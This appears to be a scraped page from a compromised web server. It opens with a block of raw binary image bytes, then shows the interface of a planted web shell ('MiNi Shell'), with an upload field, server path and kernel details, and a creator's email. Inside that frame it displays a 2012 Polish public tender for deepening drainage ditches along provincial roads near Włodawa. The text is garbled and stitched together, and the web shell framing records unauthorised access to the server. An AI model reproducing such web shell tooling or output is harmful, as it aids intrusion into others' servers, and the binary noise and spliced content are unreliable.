JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120403/76047-N-2012.html

<p class="kh_header"><b>Włodawa: Kopanie i pogłębianie rowów odwodniających wraz z profilowaniem dna i skarp
 rowów  przy drogach wojewódzkich:
  1) Zadaniem Nr 1 - droga wojewódzka Nr 812 Biała Podlaska - Wisznice -
       Włodawa - Chełm w m. Korolówka (od km 71+015 do km 71+227)
  2) Zadanie Nr 2 - droga wojewódzka Nr 816 Terespol - Kodeń - Sławatycze -
      Włodawa - Dorohusk - Horodło - Zosin, na odc. Stawki - Różanka
      (od km 51+102 do km 51+620 i od km 51+625 do km 54+600)</b><br>
<b>Numer ogłoszenia: 76047 - 2012; data zamieszczenia: 03.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich Lublin Rejon Dróg Wojewódzkich we Włodawie , ul. Lubelska 60, 22-200 Włodawa, woj. lubelskie, tel. 082 5721635, 5721151, faks 082 5721793.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kopanie i pogłębianie rowów odwodniających wraz z profilowaniem dna i skarp
 rowów  przy drogach wojewódzkich:
  1) Zadaniem Nr 1 - droga wojewódzka Nr 812 Biała Podlaska - Wisznice -
       Włodawa - Chełm w m. Korolówka (od km 71+015 do km 71+227)
  2) Zadanie Nr 2 - droga wojewódzka Nr 816 Terespol - Kodeń - Sławatycze -
      Włodawa - Dorohusk - Horodło - Zosin, na odc. Stawki - Różanka
      (od km 51+102 do km 51+620 i od km 51+625 do km 54+600).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres robót obejmuje:
    Zadanie Nr 1
    a) roboty pomiarowe i przygotowawcze
    b) kopanie rowu z odwiezieniem urobku w miejsce wskazane 
        przez Zamawiającego - 106,3 m3, 
    c) wykonanie przepustu po zjazdem (rury zabezpiecza Zamawiający) - 6 m
    d) wykonanie przepustu z rur strukturalnych kanalizacji zewnętrznej PP SN 8
        średnicy 60 cm za wiatą przystankową - 10 m
    e) oczyszczenie przepustów śr. 60 cm z namułu - 8 m,
   Zadanie Nr 2
    a) pogłębianie rowów wraz z profilowaniem dna i skarp rowów z odwiezieniem urobku 
        w miejsce wskazane przez Zamawiającego - 5824 m ,
    b) oczyszczenie przepustów śr. 60 cm z namułu - 54 m, 
    c) oczyszczenie przepustów śr. 40 cm z namułu - 9 m
2. Szczegółowy zakres robót ujęty jest  w Szczegółowej Specyfikacji Technicznej oraz kosztorysie ofertowym, przedmiarach robót stanowiących część pomocniczą
    określenia ilości robót. 
3. Okres rękojmi za wady dla robót objętych zamówieniem wynosi 2 lata od daty
    odbioru  ostatecznego.
4. Zgodnie  z art. 30 ust. 4 ustawy, Zamawiający dopuszcza rozwiązania równoważne
    opisywanym.  Wykonawca, który powołuje się na rozwiązania równoważne
    opisywanym przez  Zamawiającego jest obowiązany wykazać, że oferowane roboty
    budowlane spełniają  wymagania określone przez Zamawiającego (art. 30, ust. 5 ustawy)
		Za rozwiązania równoważne uznana będzie oferta na wykonanie zamówienia przy wykorzystaniu technologii, materiałów i sprzętu innego niż określone w SST, pod warunkiem że ich parametry będą nie gorsze niż określone w SST.
Szacunkowa wartość zamówienia netto: Zadanie Nr 1 - 10955,12 PLN, Zadanie Nr 2 - 111604,44 PLN.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.11.00.00-1, 45.11.20.00-5, 45.11.21.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunków posiadania wiedzy i doświadczenia 
Wykonawca winien wykonać w ciągu ostatnich pięciu lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie minimum 1 robotę obejmującą kopanie, lub renowację rowów o wartości min. 20 000,00 zł. brutto
Ocena spełnienia warunku będzie dokonywana w następujący sposób:
    spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie dysponowania odpowiednim potencjałem technicznym
          Wykonawca winien dysponować jednostkami sprzętu i środkami transportu
          wymienionymi poniżej
          1) koparka podsiębierna - 1 szt.
          2) spycharka lemieszowa lub równiarka samojezdna - 1 szt.
          3) samochód ciężarowy samowyładowczy - 1 szt. 
	4) ubijak spalinowy - 1 szt.
Ocena spełnienia warunku będzie dokonywana w następujący sposób:
    spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do
          wykonania zamówienia Wykonawca winien dysponować minimum jedną osobą,
          która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą 
          uprawnienia budowlane w specjalności drogowej uprawniające do
          pełnienia funkcji kierownika budowy.
Osoby przewidziane do pełnienia samodzielnych funkcji technicznych w budownictwie muszą posiadać wymagane uprawnienia, które zostały zgodnie z ustawą Prawo budowlane z dnia 7 lipca 1994 r. (z późniejszymi zmianami) art. 12 ustęp 1 ppkt. 2, ustęp 7, art. 12a lub uprawnienia uzyskane na podstawie przepisów obowiązujących przed wejściem w życie ustawy prawo budowlane z 1994 r., Natomiast w przypadku osób które uzyskały uprawnienia w innych krajach Unii Europejskiej posiadane uprawnienia muszą spełniać warunki określone w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394)
Ocena spełnienia warunku będzie dokonywana w następujący sposób:
    spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oprócz oświadczeń i dokumentów jakie należy dostarczyć w celu
    potwierdzenia spełniania warunków udziału w postępowaniu, Wykonawca obowiązany
    jest dołączyć do oferty:
       1) Ofertę przetargową (z ceną netto i z podatkiem VAT, wraz z 
           kosztorysem ofertowym     2)  Zaakceptowany wzór umowy i warunków do umowy       3)  Wykaz części zamówienia których wykonanie Wykonawca zamierza zlecić
           Podwykonawcy ,
      4) W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, 
          do oferty należy   załączyć   dokument   (np. odpowiednią  umowę) ustanawiający 
          pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia
          albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia
          publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych.
      5) W przypadku podpisania oferty i innych dokumentów przez osobę/osoby, które 
          nie są  wymienione w odpisie z właściwego rejestru do oferty należy załączyć
          dokument potwierdzający prawo do reprezentowania podmiotu przez osobę /osoby
          podpisujące ofertę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany i uzupełnienia treści umowy wymagają formy pisemnej pod rygorem ich
    nieważności.
2. Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje
    możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści
    oferty polegających na:
1)   Zmiany terminu zakończenia wykonania robót o czas niezbędny do ich
      zakończenia gdy wystąpi którakolwiek z wymienionych poniżej okoliczności: 
1) klęski żywiołowe jak: huragany, powodzie, trzęsienia ziemi,
2) niekorzystne warunki atmosferyczne powodujące wstrzymanie prac 
     przynajmniej przez 8 godzin w ciągu doby (długotrwałe obfite opady
     deszczu, niskie temperatury) uniemożliwiające wykonywanie robót
     zgodnie z SST.
                Termin wykonania umowy wydłuża się o liczbę dni, w których niemożliwe
                 było wykonywanie robót. Ilość dni określa Inspektor Nadzoru, sporządzając
                 na  okoliczność stosowny protokół.
2)  Zmiany osobowe
     a) zmiana osób przy pomocy których Wykonawca realizuje przedmiot umowy na
          inne spełniające warunki określone w SIWZ,
   Zmiana taka nie wymaga aneksu do umowy. 
3)  Zmiany spowodowane następującymi okolicznościami
     a) w przypadku wystąpienia siły wyższej której strony nie mogły przewidzieć, której
         nie mogły zapobiec ani której nie mogą przeciwdziałać, a która uniemożliwia
         Wykonawcy wykonanie w części lub całości jego zobowiązań</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ebip.lublin.pl/zdw<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie, 22-200 Włodawa, ul. Lubelska 60 
  pokoju nr 2, w godz. 7:00 - 15:00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.04.2012 godzina 09:00, miejsce: Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie, 22-200 Włodawa, ul. Lubelska 60, pokój Nr 15 /sekretariat/
Otwarcie ofert w dniu 19/04/2012 godz. 09:10, pokój Nr 16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują: za pomocą faksu nr (82) 572-17-93 lub drogą elektroniczną na adres e-mail: rdw.wlodawa@zdw.lublin.pl
         Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną , każda ze stron    
na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
        Osoby uprawnione do porozumiewania się z Wykonawcami.
               1.   W sprawach technicznych - Stanisław Głogowski  tel. 601 676 826
            2. W sprawach   formalno-prawnych   związanych   z   postępowaniem 
             o udzielenie zamówienia i zawarciem umowy - Barbara Winiarczyk, 
             Eugeniusz  Kiewczykowski  tel. (82) 572 16 35
1.  Odwołanie przysługuje wyłącznie od niezgodnej z przepisami ustawy czynności
     zamawiającego podjętej w postępowaniu o udzielenie zamówienia lub zaniechania 
     czynności, do której zamawiający jest zobowiązany na podstawie ustawy.
  Odwołanie przysługuje zgodnie z art. 180 ust. 2 ustawy Prawo zamówień publicznych 
     (Dz. U. z 2010 r.  Nr 113 poz. 759 z późn. zmian.) wyłącznie wobec czynności:
     1) opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu,
     2) wykluczenia odwołującego z postępowania o udzielenie zamówienia,
     3) odrzucenia oferty odwołującego.
 Odwołanie powinno wskazywać czynność lub zaniechanie czynności Zamawiającego, 
     której zarzuca się niezgodność z przepisami ustawy, zawierać zwięzłe przedstawienie 
     zarzutów, określać żądanie oraz wskazywać okoliczności faktyczne i prawne 
     uzasadniające wniesienie odwołania. 
Odwołanie wnosi się do Prezesa Izby w formie pisemnej albo elektronicznej opatrzonej
     bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego 
     kwalifikowanego certyfikatu.
 Odwołujący przesyła kopię odwołania Zamawiającemu przed upływem terminu do
    wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią przed
    upływem tego terminu. Domniemywa się, iż Zamawiający mógł zapoznać się z treścią odwołania przed upływem terminu na jego wniesieni, jeżeli przesłanie jego kopii nastąpiło przed upływem na jego wniesienie za pomocą jednego ze sposobów określonych 
    w art. 27 ust. 2 ustawy.
 Zgodnie z art. 182 ust. 1 pkt. 2) odwołanie wnosi się w terminie 5 dni od dnia przesłania informacji o o czynności zamawiającego stanowiącej podstawę jego wniesienia  - jeżeli zostały przesłane w sposób określony w art. 27 ust. 2, albo w terminie 10 dni - jeżeli zostały przesłane w inny sposób.
 Zgodnie z art. 182 ust 2 pkt. 2 odwołanie wobec treści ogłoszenia o zamówieniu wnosi się w terminie 5 dni od dnia zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych lub specyfikacji istotnych warunków zamówienia na stronie internetowej.
 Odwołanie wobec czynności innych niż określone w pkt. 6 i 7 wnosi się w terminie 5 dni od dnia, w którym  powzięto lub przy zachowaniu należytej staranności można było powziąć wiadomość o okolicznościach stanowiących podstawę jego wniesienia.
 Jeżeli Zamawiający nie przesłał Wykonawcy zawiadomienia o wyborze najkorzystniejszej oferty odwołanie wnosi się w terminie 15 dni od dnia zamieszczenia w Biuletynie Zamówień Publicznych ogłoszenie o udzieleniu zamówienia.
 Jeżeli Zamawiający nie zamieścił w Biuletynie Zamówień Publicznych ogłoszenia o udzieleniu zamówienia odwołanie wnosi się w terminie 1 miesiąca od dnia zawarcia umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadaniem Nr 1 - Kopanie rowu - droga wojewódzka Nr 812 Biała Podlaska - Wisznice -
       Włodawa - Chełm w m. Korolówka (od km 71+015 do km 71+227).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres robót obejmuje:
      a) roboty pomiarowe i przygotowawcze
    b) kopanie rowu z odwiezieniem urobku w miejsce wskazane 
        przez Zamawiającego - 106,3 m3, 
    c) wykonanie przepustu po zjazdem (rury zabezpiecza Zamawiający) - 6 m
    d) wykonanie przepustu z rur strukturalnych kanalizacji zewnętrznej PP SN 8
        średnicy 60 cm za wiatą przystankową - 10 m
    e) oczyszczenie przepustów śr. 60 cm z namułu - 8 m,
Szacunkowa wartość zadania netto: 10955,12 PLN.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.11.00.00-1, 45.11.20.00-5, 45.11.21.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 - Pogłębianie rowów - droga wojewódzka Nr 816 Terespol - Kodeń - Sławatycze -
      Włodawa - Dorohusk - Horodło - Zosin, na odc. Stawki - Różanka
      (od km 51+102 do km 51+620 i od km 51+625 do km 54+600).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres robót obejmuje:
a) pogłębianie rowów wraz z profilowaniem dna i skarp rowów z odwiezieniem urobku 
        w miejsce wskazane przez Zamawiającego - 5824 m ,
    b) oczyszczenie przepustów śr. 60 cm z namułu - 54 m, 
    c) oczyszczenie przepustów śr. 40 cm z namułu - 9 m
Szacunkowa wartość zadania netto: 111604,44 PLN.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.11.00.00-1, 45.11.20.00-5, 45.11.21.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com